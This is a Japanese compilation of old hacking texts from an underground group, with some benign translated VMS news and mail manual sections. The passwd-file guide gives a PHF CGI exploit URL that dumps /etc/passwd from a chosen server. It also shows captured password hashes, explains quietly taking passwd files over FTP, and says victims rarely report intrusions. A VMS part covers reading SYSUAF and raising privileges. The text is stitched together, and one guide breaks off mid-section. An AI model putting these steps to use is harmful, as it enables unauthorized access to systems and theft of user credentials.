って色々ヘルプしてくれた人物だ。そしてVizual Sea Plus + について色々と助 言をくれたTetralite氏、そしてGammaとreamer7にも感謝の意を評する。よし、じ ゃあそろそろ俺の愉快な世界へとなだれ込もうじゃないか。 HTTPは1990年からWorld Wide Web(WWW)で使用され、当初のバージョンは0.9 だった。このバージョンはRAM dataのみを送信できた。次にリリースされたバージ ョンが1.0である。このバージョンはMIMEフォーマット(Multipurpose Internet Mail Extensions)をサポートするまでに改善されが、断層化プロクシ、caching等は サポートしなかった。そして最新版である1.1とはこれらの欠点をさらに改良し たバージョンである。 よし、とりあえず今回が俺にとって最初のHTTP講座になるので、簡単な所のみ教 える事のする。お前のブラウザにLOCATIONをタイプした時、何がサーバー送信さ れるのかを説明しよう。そしてそれをTELNETで行う方法も教える。 仮にお前がNETSCAPEを使用しているとしよう。LOCATIONの所にURLを打つ:例えば http://www.well.com/user/woa/だとする。するとまずNETSCAPEはその指定された サーバーが生きているか、PING(俺が思う限り)を送る。つまりこれは http://www.well.comにコンタクトを取っているという事だ。するとブラウザの下 にwww.well.comから“よっ!!生きてるぜ。何が欲しいんだ?”というメッセージ が表示される。(翻注:実際はこんなメッセージは表示されない)そこでNETSCAPEは www.well.com/user/woa が欲しいと言うと、サーバーはこのURI (Universal Resource Identifier)の処理を行い、指定されたURLを探し出し、そのソースをお前のブラ ウザに送信する。それを受け取ったNETSCAPEは指定されたフォーマットでそれを 処理するのである。 そしてなんと同じ事がTELNEを通して可能なのである。これがお前のする事だ。ま ずTelnet www.well.com :80で接続、(大抵PORT80はTELNETのHTTP PORTである) そしてサーバーが作動している事を証明するようなメッセージを表示したら、次 に:GET /user/woa/ HTTP/1.1 Host: www.well.comと打ち込む。そしてENTERを2 回押すと、指定されたディレクトリのソースコードがお前の所に送信されるのだ。 俺も最近HTTPに関して調べるようになったのでここで説明は止めとく。 ここで注 意点だが、実際にwww.well.comやhttp.yahoo.comに行ってもこれに関するドキュメ ントなど紹介されていない。サーバーは自動的にHOSTファイルを見るようになって おり(大抵はindex.html)、このケースではpathを指定する場所を"/" にする。 (例: GET / HTTP/1.1) とりあえずこれで終了にする。ちかじかhttpに関するテキストを公開する予定だ。 ICQではUIN:1019826でコンタクト可能なので、何か質問やコメントや、今後のテ キストのアイデアに関して意見があったら是非連絡をとってほしい。 A devision of LOU -PlahZma Legions Of the Underground http://www.hackersclub.com/lou Sping Attack..What you should Know File Information was obtained from http://www.darkening.com/ssping ==================================== <<これは一体何?>> SSPING/Joltとは殆どのWindows95とWindowsNT機種に対してフリーズを起こさせる プログラムである。 基本的にこれはSpoofかICMP PACKETを、攻撃ターゲットとなるUSERのコンピ ューターに送りつける。これにより64kのPINGを作り、それを受け取ったWindows95/NT は、そのパケットを一度に起動させようとする。 <<誰に対して影響するか?>> これはファイアーウオール外に存在する殆ど全てのWindows95、Memphis、 WindowsNT機種に有効する。ファイアーウオール内の機種だとICMPを抑さえてし まうので効かない。それでも一部のファイアーウオール外のPCでも効かないと いう事もある。これはPCにパッチがついているからである。そして一部の古い MacOSのマシンにも有効である。 大概のQuakeやIRCを利用している連中は一度はSSPING/FREEZアタックを受けた 事があるだろう。とりあえずパッチを付ける事を勧める。 <<何故こんなことが起こるのか?>> 私が思うに根本的な理由とはMicrosoftは通常RFCを通して警告を流すのだが 肝心な「もし実際に攻撃を受けたら?」の部分には触れていないのである。しか もこういった怠慢はICMP上で問題が浮上してから何度も起きている事なのである。 <<どうやって防ぐか?>> とりあえずMSのホームページからパッチをダウンロードしてと付けること。後 は出来るだけ自分のIPを公開しないこと。そしてPINGアタックに関するさらなる 詳しい情報を収集することも勧める。 詳しくは下記のアドレスでどうぞ。 http://isl.educ.fukushima-u.ac.jp/~shinoda/net-docs/ping/ [***The Ultimate Guide Passwd Files***] By Goat 目次 1. Introduction 2. Passwd Fileって何? 3. PHF Exploit 4. FTP Passwd 5. Shadowed Passwds 6. Crackers 7. Wordlists 8. Using Cracked Passwds ________________________________________________________ 1. Introduction パスワードファイルはハッキングで最もシンプルで簡単な行為である。 このテキストにおいて、それが何なのか、どうやって得るか、どうやって クラックするか、クラックするに何が必要か、そしてそれら得た物で何を するか等を説明する。当然このテキストファイルの為にクラックしたパス ワードで登録など行った場合、それは法律違反である。このテキストファ イルは情報のみ、違法行為の為ではない。もし自らここで情報を使用して、 違法行為に及ぶつもりなのであれば、それは自分以外誰の責任でもない。 ではさっそく話に入ろう。 2. What is a Passwd File Passwd Fileとはサーバーに登録されたユーザーのパスワードが含まれている ファイルで、暗号化されている。ここでのキーワードは【暗号化】である。じ ゃあここで俺がやる事はそのファイルを見つけて大当たりを得ればいいなんて 思わないでもらいたい。残念ながらそれは違う。その行為以前に、まだ沢山の 事がある。passwd fileとは下記のような感じに構成されている。 root:x:0:1:0000-Admin(0000):/:/bin/ksh daemon:x:1:1:0000-Admin(0000):/: bin:x:2:2:0000-Admin(0000):/usr/bin: listen:x:37:4:Network Admin:/usr/net/nls:nobody:x:60001:60001:uid nobody:/:noaccess:x:60002:60002:uid noaccess:/: ftp:x:101:4: FTPUser:/export/home/ftp: rrc:uXDg04UkZgWOQ:201:4:RichardClark:/export/home/rrc この中で唯一見られる名前は rrc:uXDg04UkZgWOQ:201:4:RichardClark:/export/home/rrc だけである。 これがファイルを読む方法である。 rrc:uXDg04UkZgWOQ:201:4:RichardClark:/export/home/rcc Username: rcc Encrypted Password(暗号化パスワード): uXDg04UkZgWOQ User number: 201 Group Number: 4 Real Name (usually)【本名】: Richard Clark Home Directory: /export/home/rrc Type of Shell(シェルの種類): /bin/ksh ここでは名前と、それに対するパスワードのみしか含まれていないので、 FTP、listen、Bin等といったパスワードが含まれているpasswd fileは 得られない。 3. PHF Exploit まず最初にExploitが何かを説明する。Exploitとはソフトウエア上における 【穴】の事であり、何かそこから得られる事の意味・・・まぁ本当はやって はいけないのだがな。PHF ExploitとはCGI上の【穴】の意味である。殆どのサーバー は既に修理している。(もしCGIを持っているなら)仮に何処か有名なIRC サーバーがCGI で問題を起こしたとしよう。サーバー上のサブジェクト (subject)における【穴】であり、海外サーバーは未だにこれを抱えている。 FTPサーバーとは異なり、FTPとかサーバーにログインする必要は無い。 ここでやる事はWWWブラウザを立ち上げて、次のアドレスを打ち込むだけ である。 http://***.****.***/cgi-bin/phf?Qalias=j00%ffcat%20/etc/passwd ここでの***.****.***の部分には、自分が侵入したいサーバーの名前を入れれ ばいい。仮にここで"The requested object does not exist on this server" や"The link you followed is either outdated, inaccurate, or the server has been instructed not to let you have it."と出た場合、そこには無いと いう意味である。もし"You have been caught on Candid Camera!"と出た場合、 それは相手がお前を捕まえたという意味である。しかし心配しなかれ。相手が実際に 報告する事など希である。 root:JPfsdh1NAjIUw:0:0:Special admin sign in:/:/bin/csh sysadm:ufcNtKNYj7m9I:0:0: Regular Admin login:/admin:/sbin/sh bin:*:2:2:Admin :/bin: sys:*:3:3:Admin :/usr/src: adm:*:4:4:Admin :/usr/adm:/sbin/sh daemon:*:1:1: Daemon Login for daemons needing nobody:*:65534:65534::/: ftp:*:39:39:FTP guest login:/var/ftp: dtodd:yYn1sav8tKzOI:101:100:John Todd:/home/dtodd:/sbin/sh joetest:0IeSH6HfEEIs2:102:100::/home/joetest:/usr/bin/restsh" これが大当たりの例である。これをtextとしてセーブする。後程これらを使って のレッスンを行うので。 ________________________________________________________________ 4. FTP Passwd あるシステムではPasswd fileはFTPに保管、FTPが匿名アクセスを許可する 限り、大抵の人達からのアクセスが可能になっている。もしある特定のサーバー のpasswd file入手に闘志を燃やしているのであれば(オープンでは無い 可能性があるので、ヤルのであれば死物狂いで欲しい時か、自分のサーバー をハックするだけにしろ)FTPにアクセスさせてくれるアカウントを入手する ことだ。ここですることはWS FTPやCute FTPといった、FTPクライアントを入手 することである。そしてサーバー名を探して接続する。 そしたらetc, hiddenやincoming,やpubといったディレクトリのリストが出てく るから、ここでetcディレクトリに行く。etc内部のファイルにはgroupやpasswd といったファイルがある。もしこの時点でshadowという言葉を目撃した場合、 8/10の確立でshadow化passwdに出くわすことだろう。とにかくパスワード ファイルを入手し、疑わられないように、他にサーバー内になにがあるかも 見ておく。そしてlogoutする時にpasswd fileを立ち上げる。この時"root、daemon、 FTP、nobody、ftploginそしてbinといった名前の後でpasswd化されたパスワード が置かれている部分に【*】マークがあったら、それはパスワードクラックは出 来ないpasswd fileを得てきた事になる。パスワードファイル上でrcc:*:やggills:*:" といった*マーク (それか他のシンボル)だったら、shadowed passwdを得たという 事である。当然しっかりと注意して読んでいて、下記のような物を得た場合: joetest:0IeSH6HfEEIs2:102:100::/home/joetest:/usr/bin/restsh これはお前がクラック可能なパスワードを入手したという意味である。 ________________________________________________________________ 5. Shadowed Passwd's さて、ここでjoetest:*:102:100::/home/joetest:/usr/bin/restshというように passwd file入手に失敗した場合---=user nameであり、プログラム名ではない--- shadow passwdを入手したとういう事である。これは他の場所にencrypt化された passwordsがある。使用しているサーバーのOSによってその場所は異なる。まずサー バーのOSの機種を調べる方法としてTELNETで接続する。(当然サーバーに接続する) もしここでTELNET出来ないのであれば、他の方法がある。下記では、異なるシステム 内のパスワードが保管されている場所を説明している。 UNIX Path Token ---------------------------------------------------------------- AIX 3 /etc/security/passwd ! or /tcb/auth/files/ / * SunOS4.1+c2 /etc/security/passwd.adjunct ##username SunOS 5.0 /etc/shadow Directory SYS$SYSDEVICE:<000000> 000000.DIR;1 AMMONS.DIR;1 NEWS.DIR;1 RJE.DIR;1 SECURITY.DIR;1 TEST.DIR;1 Total of 6 files. Directory SYS$SYSDEVICE: *INTERUPT* $ システム内の全てのディレクトリのリストを表示するには、こちらの方が効果的 である。まず最初のディレクトリではサブディレクトリを含まない殆ど全ての ディレクトリを見る事が出来る。上の例と<*.*>の違いとは、前者の方が後者よ りより沢山のディレクトリ/ファイルを表示するのである。大抵の場合ディレクトリ の名前とユーザー名は同じなのでもしアナタが正規のユーザーでなくてもさらに 沢山のUSERNAMEを入手する事が出来る。そして上の例で気がついたと思うが途中 *INTERUPT*という文字と、その下にドルマークが見える。これは筆者がコマンド 実行中にCONTROL+Yを押したからである。4.0とそれ以上のバージョンで優れている 部分とは、例えば巨大なディレクトリやファイルのリストを画面に表示っせている 最中でもCONTROL+Cキーを押せば*CANCEL*という文字が表示され、次のディレクトリに 進のである。 特定にファイルやディレクトリの詳細を表示されるには下記のコマンドを行なう。 $ DIR /FULL Directory SYS$SYSDEVICE: INTRO.TXT;5 FILEID: (929,23,0) Size: 2/3 Owner: Created: 25-MAY-1985 12:38 Revised: 2-MAY-1985 12:38 (2) Expires: Backup: File organization: Sequential File attributes: Allocation: 3,Extend: o, Global buffer count: 0 Version limit: 3 Record format: Variable length, maximum 74 bytes Record attributes: Carriage return carriage control File protection: System:RWED, Owner:RWED, Group:, World:, Access Control List None ここで重要な部分とはFile protection:と、もしACLのファイルも表示されるな らその部分にも注目しておきたい。/FULLで、指定したディレクトリ内にある一つ 一つのファイルの詳細を表示する。 DEVICES: -------- 場合によってはディレクトリを検索した時、予想より少なく検索されるなんて ことがある。これはディレクトリを検索した際、USERが同じDEVICESにいない からである。DEVICESを変更するには下記のコマンドを行なう。 $ SET DEVICE DEVICENAME: 入力後、コロン(:)を入力する事を忘れないように。そしてUSERがどの DEVICE に変更していいか分からない時は下記のコマンドを行なう。 $ SHOW DEVICE これで現在システム内で使用されているDEVICEのリストを表示させることができる。 FILE EXTENSIONS:(ファイル拡張子) ---------------- 下記の拡張子は特定のファイルを表示する時等に、ワイルドカードと伴に使用 する。 .MEM memo file: These often contain inter-office memos. TYPE this file. .JOU journal file: This is a Journal file, which is created when editing .JNL journal file: a file. This may contain interesting info. Use TYPE. .TMP temporary file: This is a temporary image of a file. TYPE this file. .LIS list file: Listing file, use same procedure as stated above. 例: $ TYPE <000000...>*.MEM;* AUTHORIZE AND THE UAF: ---------------------- パート1で私はAUTHORIZE.EXE;1ファイルは directory内で見つかると 言ったが、実はか<000000.SYSEXE>の両directory内で見つかる事 が分かった。もしアナタが正規ユーザーでないのであれば、このディレクトリに 足を運び、SYSUAF.LISと入力する事を勧める。これはSHOW * /FULLコマンドと同 じような働きをする。このコマンドを実行したら、下記のようなOUTPUTが表示 されるはず。 Username: SYSTEM Owner: SYSTEM MANGER Account: SYSTEM UIC: <001,004> CLI: DCL LGICMD: Default Device: SYS$ROOT: Default Directory: Login Flags: Primary days: Mon Tue Wed Thu Fri Secondary days: Sat Sun No hourly restrictions PRIO: 4 BYTLM: 20480 BIOLM: 12 PRCLM: 10 PBYTLM: 0 DIOLM: 12 ASTLM: 20 WSDEFAULT: 150 FILLM: 20 ENQLM: 20 WSQUOTA: 350 SHRFILLM: 0 TQELM: 20 WSECTENT: 1024 CPU: no limit MAXJOBS: 0 MAXACCTJOBS: 0 PGFLQUOTA: 200000 Privileges: CMKRNL CMEXEC SYSNAM GRPNAM ALLSPOOL DETACH DIAGNOSE LOG-IO GROUP ACNT PRMCEB PRMMBX PSWAPM ALTPRI SETPRV TMPMBX WORLD OPER EXQUOTA NETMBX VOLPRO PHY-IO BUGCHK PRMGBL SYSGBL MOUNT PFNMAP SHMEM SYSPRV SYSCLK GROUP BYPASS UAF> 最後にPrivilegesのリストが表示されるが、ここで重要なヤツを幾つか紹介する。 ACNT: May surpress accounting message. OPER: Operator privilege. GROUP: May affect other processes in the same group. WORLD: May affect other processes in the world. SHMEM: May create/delete objects in shared memory. ALTPRI: May set any priority level. BYPASS: May bypass UIC checking. SETPRV: May set any privilege bit. SYSLCK: May lock system wide resources. SYSPRV: May access objects via system protection. VOLPRO: May override volume protection. READALL: May read anything as the owner. SECURITY: May perform security functions. 自分のPrivilegesを調べるには下記のコマンドを行なう。 $ SET PROCESS /PRIVS 01-JUN-1985 15:50:56.31 RTA1:User: ACIRS508 Process privileges: LOG-IO May do logical I/O. PHY-IO May do physical I/O. TMPMBX May create temporary mailbox. Process rights identifiers: INTERACTIVE REMOTE $ もしUSERがSETPRV privilegeを持っているのなら、下記のコマンドを使えば自分 でprivs(パート1で説明)を指定することが出来る。 $ SET PROCESS /PRIVS=ALL SECURITY DEVICES AND SOFTWARE: ------------------------------ VMSではさらに幾つかのセキュリティー機能を追加する事が可能である。下はそ の一部である。 品名: ALSP (Applications Level Security Package) 製造: Integrated Systems Inc. 場所: New Jersey. 電話: (201) 884-0892. 値段: $650.00 詳細: ALSPのこの商品では正規ユーザーのコマンドに規制をかけて、システムとリソース アクセスをプロテクトする機能を持つ。 品名: DIALBACK and AUDIT 製造: Clyde Digital Systems Inc. 場所: Provo, Utah 電話: 1-800-832-3238. 値段: $980.00 and $2500.00 respectively. 詳細: DIALBACKはダイアルアップユーザーを制御する事によってシステムをプロテクト する物である。これはダイアルアップでアクセスを試みようとするユーザーさえ 制御する代物である。一度DIALBACKを持つシステムにアクセスして失敗すると、 DIALBACKはID codeを認証し、ユーザーリストからそのユーザーの詳細と電話番号 を調べだす、厄介な物である。 AUDITはかなり複雑なセキュリティーソフトウエアである。これはUSERが、 システムのターミナルの行動を完全なAUDIT TRAIL(足跡の調査)に設定 出来る代物である。 品名: Data Encryption System (DES) Verson II and Menu/Authorization Processor System (M/APS) Version I. 製造: McHugh, Freeman & Associates, Inc. 場所: Elm Grove, Wisconsin 電話: (414) 784 8250. 値段: 1,250.00 and 995.00 respectively. 詳細: DESシステム内のファイルをシングルもしくはダブルでEncryptionする。DESは ソース、データ、イメージ(バイナリ)をEncryptする。 M/APSは正規ユーザーに対してシステム内のアプリケーションへのアクセス をセキュリティーメニューで表示、そしてM/APSへのAUDIT TRAILも表示する。 CONCLUSION: ----------- もしVMSに搭載されている全てのセキュリティー機能が作動したら、そのシステム はIBMを越え、巷に存在するシステムで最も安全なシステムとなるだろう。 VM/CMS, MVS/TSO, DOS, CICS, etcといったIBMオペレーティングシステムは ACF2, RACF, TOP SECRET, etc.といった一つ$20,000から$30,000もするソフトを 併合して使用しないと安全とは言い切れない。DES自身けして悪い機能ではないし、 上の追加ソフトと比べれば値段も半分以下という事では非常に利用価値はある。 しかし、相手はコンピューターではなく人間である。この事を理解するまで、シ ステム管理人はいつまでも不正アクセス者の為にシステムをオープンし続けるの である。 ACKNOWLEDGEMENTS: ----------------- The Blue Archer ノヘヘヘヘヘヘヘヘヘヘヘヘヘヘヘヘヘヘヘヘヘヘヘヘヘヘヘヘヘヘヘヘヘヘヘヘヘヘヘヘヘヘヘヘヘヘヘヘヘヘヘヘヘヘヘヘヘヘヘヘヘサ コ コ コ THE TEXT SPECIALIST -- 99.99% PURE TEXT コ コ コ ネヘヘヘヘヘヘヘヘヘヘヘヘヘヘヘヘヘヘヘヘヘヘヘヘヘヘヘヘヘヘヘヘヘヘヘヘヘヘヘヘヘヘヘヘヘヘヘヘヘヘヘヘヘヘヘヘヘヘヘヘヘシ X-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-X Another file downloaded from: The NIRVANAnet(tm) Seven & the Temple of the Screaming Electron Taipan Enigma 510/935-5845 Burn This Flag Zardoz 408/363-9766 realitycheck Poindexter Fortran 510/527-1662 Lies Unlimited Mick Freen 801/278-2699 The New Dork Sublime Biffnix 415/864-DORK The Shrine Rif Raf 206/794-6674 Planet Mirth Simon Jester 510/786-6560 "Raw Data for Raw Nerves" X-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-X //\\//\\//\\//\\//\\//\\//\\//\\//\\//\\//\\//\\//\\//\//\\//\\//\\//\\ \\ このテキストはオクラホマ州立大学のCOMPUTING AND INFORMATION // // SERVICE User's ManualにおけるVMS Introductionを個人的に編集、 \\ \\ 翻訳した物です。実際の英語オリジナルテキストの方が正しいと言 // // っておきます。もしオリジナルテキストが見たい方は下記のURLでご \\ \\ 覧になれます。なお間違い等が見受けられたら連絡をくださると幸い \\ // です // \\ \\ COMPUTING AND INFORMATION SERVICE User's Manual VMS Introduction // // \\ \\ http://www.okstate.edu/cis_info/cis_manual/vms_toc.html // // \\ \\ plutur@hotmail.com // //\\//\\//\\//\\//\\//\\//\\//\\//\\//\//\\//\\//\\//\//\\/\\//\\//\\// ++++++++++++++++++++++++++++++++ ////////////VMS News//////////// ++++++++++++++++++++++++++++++++ 目次: A:Accessing VMS News B:Viewing Newsgroup Listings C:Viewing Article Titles D:Viewing Articles E:Newsgroup Subscription F:Other News Commands +++++ ++++++ =====A:Accessing VMS News====== +++++ ++++++ VMSを通してNEWSにアクセスするには下記のNEWSコマンドを使う。 NEWS NEWSに初めてアクセスした時、自動的に.NEWSRCファイルが新規される。そして .NEWSRCファイルにアクセスするたびにスクリーン上にNEWSGROUPのリストが表示 される。 +++++ +++++ =====B:Viewing Newsgroup Listings===== +++++ +++++ NEWSGROUPのリストを見るにはキーボード上のUP(↑)とDOWN(↓)キーを使っ て動かす。ここでリストの左側に見える矢印は、 現在USERが選択している NEWSGROUPという意味である。 NEWSGROUPのリストはものすごく膨大な為に、これを見るなら幾つかのコマンド を利用した方が便利である。コマンドは大文字、小文字両方使用出来る。コマン ド入力後はそのコマンドを実行させる為に必ずを押す。 UP - 以前のNEWSGROUPのリストを表示する。 DOWN - 次のNEWSGROUPのリストを表示する。 UP # - 特定された番号のNEWSGROUPのリスト画面を表示する。(例: UP 18なら 18番目前に表示されたNEWSGROUPのリストを表示する) DOWN # - 特定された番号NEWSGROUPのリストの画面を表示する。(例:DOWN 120 なら120番目先のNEWSGROUPのリストを表示する) TOP - 矢印をリストの一番上に移動させる。 BOTTOM - 矢印をリストの一番下に移動させる。 LAST一番最後に開いたNEWSGROUPのリストを表示させる。 +++++ +++++ =====C:Viewing Article Titles===== +++++ +++++ 一度自分の見たいNEWSGROUPを決めたら、下記の方法でそのNEWSGROUPを見る事 が出来る。 SELECT - NEWSGROUPのタイトルと、まだ読まれていない著者を表示する。 SELECT name - 特定されたNEWSGROUPの名前のタイトルと、まだ読まれていない 著者を表示する。 DIRECTORY NEWSGROUPの記事のヘッダを表示する。 +++++ +++++ =====D:Viewing Articles===== +++++ +++++ 特定のNEWSGROUPの記事を選択するのに、キーボード上のUP(↑) やDOWN(↓) キーを使用して画面上のリストを移動させる。 そして画面左にある矢印が現在 リスト内で何処にいるかを示し、それを見る場合はを押す。 大抵リストは膨大な為に幾つかのコマンドを利用した方が便利である。下記の コマンドは大文字、小文字問わず使用出来る。 UP - 以前のタイトルに戻る DOWN - 次のタイトルを表示する。 UP # - 特定された番号のタイトルを表示する。(例: UP 18なら18番目前の ヘッダを表示する) DOWN # - 特定された番号のタイトルを表示する。(例:DOWN 35なら35番目先 のヘッダを表示する) TOP - 矢印をリストの最初に移動させる。 BOTTOM - 矢印をリストの最後に移動させる。 LAST - 最後に表示されたリストのタイトルを表示する。 NEXT - 次に用意されてるまだ読んでいない記事を表示する。 BACK - 前の、まだ読んでいない記事を表示する。 SKIP - 記事に読んだマークをしておく。 UNREAD - 記事にまだ読んでいないマークをしておく。 SEARCH - 特定の内容の記事を検索する(例:SEARCH WORLDと入力すれば次の 用意されている記事にWORLDという単語があるのを検索する。) +++++ +++++ =====E:Newsgroup Subscription===== +++++ +++++ 下記のコマンドを使用し、NEWSGROUPを調べ、購読する事も出来る。コマンドは 大文字、小文字問わず入力出来る。コマンドを入力し終わったら実行に移す為に キーを押すこと。 DIR/REG - USERが購読したいNEWSGROUPを表示する。 DIR/UNREG - まだ購読されていないNEWSGROUPを表示する。 REGISTER - 特定のNEWSGROUPを購読する。 DEREGISTER - 購読リストから特定のNEWSGROUPを削除する。しかし一度購読した NEWSGROUPを削除するコマンドであるので注意すること。 +++++ +++++ =====F:Other News Commands===== +++++ +++++ POST - NEWSGROUPに投稿する。 PRINT - 記事やをプリントする。 EXTRACT - 記事をTEXT FILEに移動させる。記事をTEXT FILEに移動させた時、 NEWS-EXTRACTSというディレクトリで新規され、そこに移動される。 新たにされたTEXT FILEは自動的にNEWSGROUPの名前が振られる。 HELP - 他の使用出来るコマンドを表示する。 NEWS - 最初のNEWSGROUPリスト戻る。 EXIT - NEWSを中止し、NEWSRC fileをアップデイトする。そして$ PROMPTに戻る。 QUIT - NEWSRC fileにアップデイトしないでNEWSを中止し、$ PROMPTに戻る。 ========================================================================== //\\//\\//\\//\\//\\//\\//\\//\\//\\//\\//\\//\\//\\//\//\\//\\//\\//\\ \\ このテキストはオクラホマ州立大学のCOMPUTING AND INFORMATION // // SERVICE User's ManualにおけるVMS Introductionを個人的に編集、 \\ \\ 翻訳した物です。実際の英語オリジナルテキストの方が正しいと言 // // っておきます。もしオリジナルテキストが見たい方は下記のURLでご \\ \\ 覧になれます。なお間違い等が見受けられたら連絡をくださると幸い \\ // です // \\ \\ COMPUTING AND INFORMATION SERVICE User's Manual VMS Introduction // // \\ \\ http://www.okstate.edu/cis_info/cis_manual/vms_toc.html // // \\ \\ plutur@hotmail.com // //\\//\\//\\//\\//\\//\\//\\//\\//\\//\//\\//\\//\\//\//\\/\\//\\//\\// +++++++++++++++++++++++++++++++ ////////Electronic Mail//////// +++++++++++++++++++++++++++++++ 目次 A:Important E-mail Tips B:Replying to a Message C:MOVE or FILE filename D:Checking for New Mail E:Forwarding Mail F:Selecting a Folder G:Deleting a Message H:Recovering a Message I:Printing a Message J:Saving a Message to a File K:Exiting MAIL +++++ ++++++ =====A:Important E-mail Tips====== +++++ ++++++ [CTRL] + "A" = Insert [CTRL] + "B" = 事前に行なったコマンドを表示する。 [CTRL] + "C" = 実行中のコマンドを中止する [CTRL] + "Q" = 中止されたスクロールを再開させる [CTRL] + "S" = スクロールするスクリーンの中止 [CTRL] + "Y" =コマンドを中止し、$PROMPTに戻す。 [CTRL] + "Z" = EXIT MAIL - 削除されていない現時点までに届いたメールを保管するファイル NEWMAIL - 新たに届き、まだ読まれていないメール WASTEBASKET - 削除準備されているメール(まだ削除されてはいない) SHALL PROMPT($)からMAILとコマンドを入力すると下記のようにディレクトリ が変わる MAIL> もし新たなメールが届いているなら下記のようなメッセージが表示される You have # new message. ここでDIRと入力、送られて来たメールのリストを表示する。 特定のメールを指定して読む場合は下記のようにコマンドを入力する。 MAIL>READ # メールを送る場合はSENDコマンドを使う MAIL>SEND TO:の隣に送り先のメールアドレスを入力する。 IN%"userid@nodename" ここでuseridは送り先の名前、nodenameは送り先のノードの場所である。 (ここで送り先のアドレスを""で閉めない送れないので注意すること) TO: IN%"yamada@abcdefg.or.jp" 次に表示されるSUBJECT:のPROMPTは記入する必要は無い。しかし記入すれば 後に自分が送ったメールのリストを調べる時にSUBJECTが表示されるので 見やすくなる。 ここで自分のBODYやSIGNATUREのメッセージを入力する。 (翻注:VAX/VMSで日本語を使用して送ると文字化けを起こします。これは絶対 かどうか分かりませんが、私のVAX/VMSで行なった結果、文字化けを起こした ので、実行に移す際は先ず自分に送ってみることを勧めます) 注:メッセージのBODYを書いてる際、必ず行の最後で<ENTER>を押さなくては いけない。そうでないとBUFFERがいっぱいになってしまうからである。BUFFERを 解除する方法は唯一、行の最後で<ENTER>を押すしかない。 メッセージ欄をのexitは[CTRL] + "z" メッセージを中止するコマンドは[CTRL] + "Q" もしVAX/VMSを通じてBITNETアドレスにメールを送ったら下記のようなメッセージ が表示される。 (UCCVMS) - Sent file... VAX/VMSを通じて一般のインターネットアドレスにメールを送ったら何もメッセージ は表示されない。唯一メッセージが表示される時は、送信エラーが起きた時だけで ある。 もしメールアドレスが間違ったまま送ると、エラーメッセージが送られる。 エラーメッセージは自分が送ったメッセージの内容(BODY、 SIGNATUR)と、 エラーメッセージを表示する。これを受け取ったら再度SENDコマンドを 使ってメールを送る。 +++++ +++++ =====B:Replying to a Message===== +++++ +++++ 1) Replying to an Open Message 受け取ったメールをそのままReplyする場合は下記のように行なう。 MAIL>REPLY 後はSENDコマンドと同じ要領で行なう。 2) Replying to a Message in the Directory List メールフォルダに入ってるメールを取り出し、それをReplyする場合は下記の 様に行なう。 MAIL>REPLY# 後はSENDコマンドと同じ要領で行なう。 +++++ +++++ =====C:MOVE or FILE filename===== +++++ +++++ Filenamesとは半角文字から成り立っており特定のファイルを指定する時に使わ れる。Filenamesは結局USERが新たに新規したい時や、受け取ったドキュメント をファイルとして保存する時に使用される。 受け取ったメッセージ等をファイルとして保存する時に下記のように行なう。 $>MAIL MOVEもしくはFILE filename ここでMOVEもしくはfilenameを入力しないでFILEと入力すると下記のメッセージ がされる。 _Folder: ここで自分が作りたいFolderの名前を指定する。 _File Folderを新規すると下記のメッセージが表示される。 %MAIL-I-NEWFOLDER..... +++++ +++++ =====D:Checking for New Mail===== +++++ +++++ SELECT NEWMAILと入力し、新しいメールが届いていないか確認する事が出来る。 もし新たにメールが届いてるなら下記の表示が出る。 You have # new messages. もし新しいメールが届いてなかったら下記のようなコマンドが表示される。 %MAIL-E-NOTEXIST... +++++ +++++ ====E:Forwarding Mail===== +++++ +++++ VMSで受信したメールをForwarding Mailする場合を紹介する SET FORWARD IN%"""userid@nodename""" FORWARDを中止したい場合、Mail PROMPTで下記のコマンドを行なう。 NOFORWARD +++++ +++++ =====F:Selecting a Folder===== +++++ +++++ Mail PromptでSELECT foldernameと入力する。もしその指定したフォルダに 新しいメールが届いていたら、そのフォルダに何通メールが届いたか表示される。 そこでDIRコマンドを使いメールのリストを表示させる。もしフォルダの中に 何も入っていないならエラーメッセージが表示される。 +++++ +++++ =====G:Deleting a Message===== +++++ +++++ PROMPTにDELETEと入力すれば今読んでいるメールを、そしてDELETE #のように 番号を指定すればその指定されたメールを削除することが出来る。DELETEを 行なうと、そのディレクトリにあるメッセージのリストにDELETEDというマーク がされ、自動的にWASTEBASKETフォルダに移動される。つまり実際には完全に削 除されていないのである。 +++++ +++++ =====H:Recovering a Message===== +++++ +++++ 上で行なったDELETEメールを取り戻したい場合、このコマンドを使う。先ずは SELECT WASTEBASKETと入力する。これでWASTEBASKETフォルダに現在何通のメー ルが入っているか表示出来る。 1. WASTEBASKETフォルダ内にあるメッセージを見る場合はDIRコマンドを使えば フォルダ内部にあるメッセージのリストが表示される。 2. 表示されたリストで自分が元に戻したいメッセージの横に振ってある番号を 調べ、READ#と入力する。 3. 次にMOVE foldernameと入力、これでメッセージはフォルダ内に移動される。 +++++ +++++ =====I:Printing a Message===== +++++ +++++ まず自分がプリントしたいメッセージにアクセスし、PROMPTにPRINTと入力する。 そして他のメッセージをプリントしたい場合は、再度そのメッセージにアクセス しなくてはならない。プリントを指定したメッセージはUSERがVMS MAILをEXITし た際に出て来る。プリンターへのOUTPUTを指定したい場合は下記のようにコマン ドを行なう。 PRINT/QUEUE=destination code コンピューターセンター等に見受けられるプリンターにはそれぞれディスティネ ーションコードが振られている。プリンターのケースの上や、管理しているHelp Desk等に聞けば分かるだろう。 +++++ +++++ =====J:Saving a Message to a File===== +++++ +++++ EXTRACTコマンドを行なえば、そのメッセージをMAIL以外のディレクトリにセーブ する事が可能である。 EXTRACT filenameyouwanttocreate ここでファイルネームにスペースを入れてはいけない。もし受け取ったメッセージ のヘッダ情報を省いてセーブしたいなら下記のようにコマンドを行なう。 EXTRACT/NOHEADER filename もし事前に新規してあるファイルにセーブしたいなら下記のようなコマンドを行 なう。 EXTRACT/APPEND filename.extension (翻注:extension=拡張子) しかしVMS MAILでは/APPENDでの/NOHEADERを許可しないので注意すること。 +++++ +++++ =====K:Exiting MAIL===== +++++ +++++ 二通りのコマンドでMAILからEXIT出来る。 QUIT(WASTEBASKETファイルは削除されない) EXIT(WASTEBASKETファイルは削除され、$ PROMPTに戻る ========================================================================== <<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> Legions Of the Underground Hacking Guide Optik Lenz 